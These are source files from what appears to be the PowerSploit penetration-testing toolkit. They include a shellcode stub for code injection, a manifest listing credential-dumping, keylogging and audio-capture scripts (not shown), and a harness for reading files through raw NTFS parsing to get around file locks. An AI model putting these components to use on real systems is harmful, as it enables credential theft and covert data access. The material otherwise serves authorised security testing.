--------------------------------------------------------------------------------
1 | [SECTION .text] ; x86 stub: call GetProcAddress(hModule, lpProcName) and store the returned address in a buffer; every 0x41414141 immediate is a placeholder patched by the PowerShell script
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save state of ebx and stack (ebx is callee-saved; it keeps the entry esp)
7 | push ebx
8 | mov ebx, esp
9 |
10 | ; Align stack: round esp down to a 64-byte boundary
11 | and esp, 0xffffffc0
12 |
13 | ; Call GetProcAddress -- stdcall: arguments pushed right to left, callee pops them
14 | mov eax, 0x41414141 ; DllHandle, supplied by PS (hModule)
15 | mov ecx, 0x41414141 ; Function name, supplied by PS (pointer to ANSI lpProcName)
16 | push ecx ; lpProcName (second argument, pushed first)
17 | push eax ; hModule (first argument, pushed last)
18 | mov eax, 0x41414141 ; GetProcAddress address, supplied by PS
19 | call eax ; result (function address or NULL) comes back in eax
20 |
21 | ; Write GetProcAddress return value to an address supplied by PS (stored unconditionally; a NULL result is stored as-is)
22 | mov ecx, 0x41414141 ; Address supplied by PS
23 | mov [ecx], eax ; 4-byte store
24 |
25 | ; Fix stack: restore esp and ebx, return to the invoker
26 | mov esp, ebx
27 | pop ebx
28 | ret
29 |
--------------------------------------------------------------------------------
/CodeExecution/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module CodeExecution`
7 |
8 | To see the commands imported, type `Get-Command -Module CodeExecution`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | # ModuleToProcess is the pre-PowerShell-3.0 name of RootModule; it is kept because of the 2.0 minimum declared below.
4 | ModuleToProcess = 'Exfiltration.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Exfiltration Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Format files (.ps1xml) to be loaded when importing this module
25 | FormatsToProcess = 'Get-VaultCredential.ps1xml'
26 |
27 | # Functions to export from this module
28 | # '*' exports every function the root module defines; with a wildcard PowerShell must load the module to learn its commands,
28 | # so they are not discoverable from the manifest alone (explicit names would allow that).
28 | FunctionsToExport = '*'
29 |
30 | # List of all files packaged with this module
31 | # Informational only: the engine does not verify that these files exist or that nothing else is present.
31 | FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
32 | 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
33 | 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
34 | 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml',
35 | 'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1'
36 |
37 | }
38 |
--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psm1:
--------------------------------------------------------------------------------
# Bring every script in the module folder into the module scope by dot-sourcing
# it: the functions those *.ps1 files define become the module's commands.
# Note that any .ps1 placed in this folder is executed on Import-Module, so
# write access to the module directory is equivalent to running code here.
Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1') |
    ForEach-Object { . $_.FullName }
2 |
--------------------------------------------------------------------------------
/Exfiltration/Get-VaultCredential.ps1xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | VaultItemView
6 |
7 | VAULTCLI.VAULTITEM
8 |
9 |
10 |
11 |
12 |
13 |
14 | Vault
15 |
16 |
17 | Resource
18 |
19 |
20 | Identity
21 |
22 |
23 | Credential
24 |
25 |
26 | PackageSid
27 |
28 |
29 | LastModified
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : LogonUser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this LogonUser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your LogonUser application.
9 |
10 |
11 | LogonUser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | LogonUser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | LogonUser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named LogonUser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // LogonUser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : logon Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this logon DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your logon application.
9 |
10 |
11 | logon.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | logon.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | logon.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
will be produced, or you can set the Ignore Import Library property to Yes
on the General property page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named logon.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
// DLL entry point for the logon DLL.
//
// Nothing is initialised or torn down for any attach/detach reason: the
// function simply reports success. Keeping it empty is also the safe choice,
// because DllMain runs under the loader lock and must not load libraries,
// create threads or wait on synchronisation objects.
//
// Returns TRUE for every reason code, so the loader never unloads the DLL.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    (void)hModule;            // unused: no per-module state is kept
    (void)ul_reason_for_call; // all of PROCESS/THREAD ATTACH/DETACH are no-ops
    (void)lpReserved;         // unused: static-vs-dynamic load is irrelevant here

    return TRUE;
}
19 |
20 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // logon.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include "targetver.h"
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 |
24 |
25 | // TODO: reference additional headers your program requires here
26 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32
16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64
17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64
18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32
19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32
20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64
21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_Attribute.h"
21 | #include "NTFS_Common.h"
22 | #include "NTFS_DataType.h"
23 | #include "NTFS_FileRecord.h"
24 |
using namespace std;

// Signature of the "StealthReadFile" export of NTFSParserDLL.dll, which _tmain
// resolves at run time with GetProcAddress.
//
// Arguments as used by _tmain below: the path to read, the caller-supplied
// output buffer, that buffer's size in bytes, a fourth value passed as 0
// (presumably a starting offset — confirm against the DLL source), an out
// parameter receiving the number of bytes written to the buffer, and an out
// parameter receiving the number of bytes remaining. The meaning of the DWORD
// return value is not visible in this file.
//
// NOTE(review): the path is passed as a std::string BY VALUE across the DLL
// boundary. That only works when the EXE and DLL are built with the same
// compiler, STL and CRT configuration (e.g. both Release /MD); otherwise the
// object layout differs and the callee reads garbage. A const char* would be
// the ABI-stable choice.
typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*);
28 |
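// Test harness for NTFSParserDLL: loads the DLL, resolves StealthReadFile,
// reads the first 1 MiB of c:\test\test.txt through it and writes whatever
// came back to c:\test\test2.txt.
//
// Returns 0 on success and 1 when the DLL/export cannot be resolved, the DLL
// reports more bytes than the buffer holds, or the output file cannot be
// opened. Command-line arguments are not used.
int _tmain(int argc, _TCHAR* argv[])
{
    (void)argc;
    (void)argv;

    // The DLL is requested by bare name, so it is located through the normal
    // DLL search order (application directory first, then system directories,
    // then PATH). Run this only from a directory you control, or pass a full
    // path, to avoid picking up a planted NTFSParserDLL.dll.
    HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll");
    if (parserDLLHandle == NULL)
    {
        cout << "LoadLibraryA(NTFSParserDLL.dll) failed, error " << GetLastError() << endl;
        return 1;
    }

    // GetProcAddress returns a FARPROC; cast straight to the expected function
    // pointer type instead of laundering it through HANDLE (a data pointer).
    StealthReadFile_Func StealthReadFile =
        (StealthReadFile_Func)GetProcAddress(parserDLLHandle, "StealthReadFile");
    if (StealthReadFile == NULL)
    {
        cout << "GetProcAddress(StealthReadFile) failed, error " << GetLastError() << endl;
        FreeLibrary(parserDLLHandle);
        return 1;
    }

    const DWORD buffSize = 1024*1024;
    BYTE* buffer = new BYTE[buffSize];
    DWORD bytesRead = 0;
    ULONGLONG bytesLeft = 0;
    DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft);

    cout << "Return value: " << ret << endl;
    cout << "Bytes read: " << bytesRead << ", bytes left: " << bytesLeft << endl;

    int exitCode = 0;

    // Never trust the callee's reported length beyond the buffer we handed it;
    // a bad value here would otherwise turn into an over-read on write().
    if (bytesRead > buffSize)
    {
        cout << "StealthReadFile reported " << bytesRead
             << " bytes but the buffer holds only " << buffSize << endl;
        exitCode = 1;
    }
    else
    {
        ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary);
        if (!myFile)
        {
            cout << "Could not open c:\\test\\test2.txt for writing" << endl;
            exitCode = 1;
        }
        else
        {
            myFile.write((char*)buffer, bytesRead);
        }
    }

    delete[] buffer;
    FreeLibrary(parserDLLHandle);
    return exitCode;
}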
49 |
50 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 | Header Files
41 |
42 |
43 |
44 |
45 | Source Files
46 |
47 |
48 | Source Files
49 |
50 |
51 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : NTFSParser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParser application.
9 |
10 |
11 | NTFSParser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 | // TODO: reference additional headers your program requires here
18 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParserDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParserDLL application.
9 |
10 |
11 | NTFSParserDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParserDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParserDLL.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
will be produced, or you can set the Ignore Import Library property to Yes
on the General property page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | // dllmain.cpp : Defines the entry point for the DLL application.
19 | #include "stdafx.h"
20 |
// Entry point of NTFSParserDLL.
//
// Deliberately does no work: the DLL's functionality is reached through its
// exports (the test harness resolves "StealthReadFile" with GetProcAddress),
// not through attach-time initialisation. Because DllMain executes while the
// loader lock is held, anything heavier than this (loading libraries,
// creating threads, blocking on synchronisation objects) would risk deadlock.
//
// Returns TRUE unconditionally so the loader keeps the module mapped.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    (void)hModule;
    (void)lpReserved;

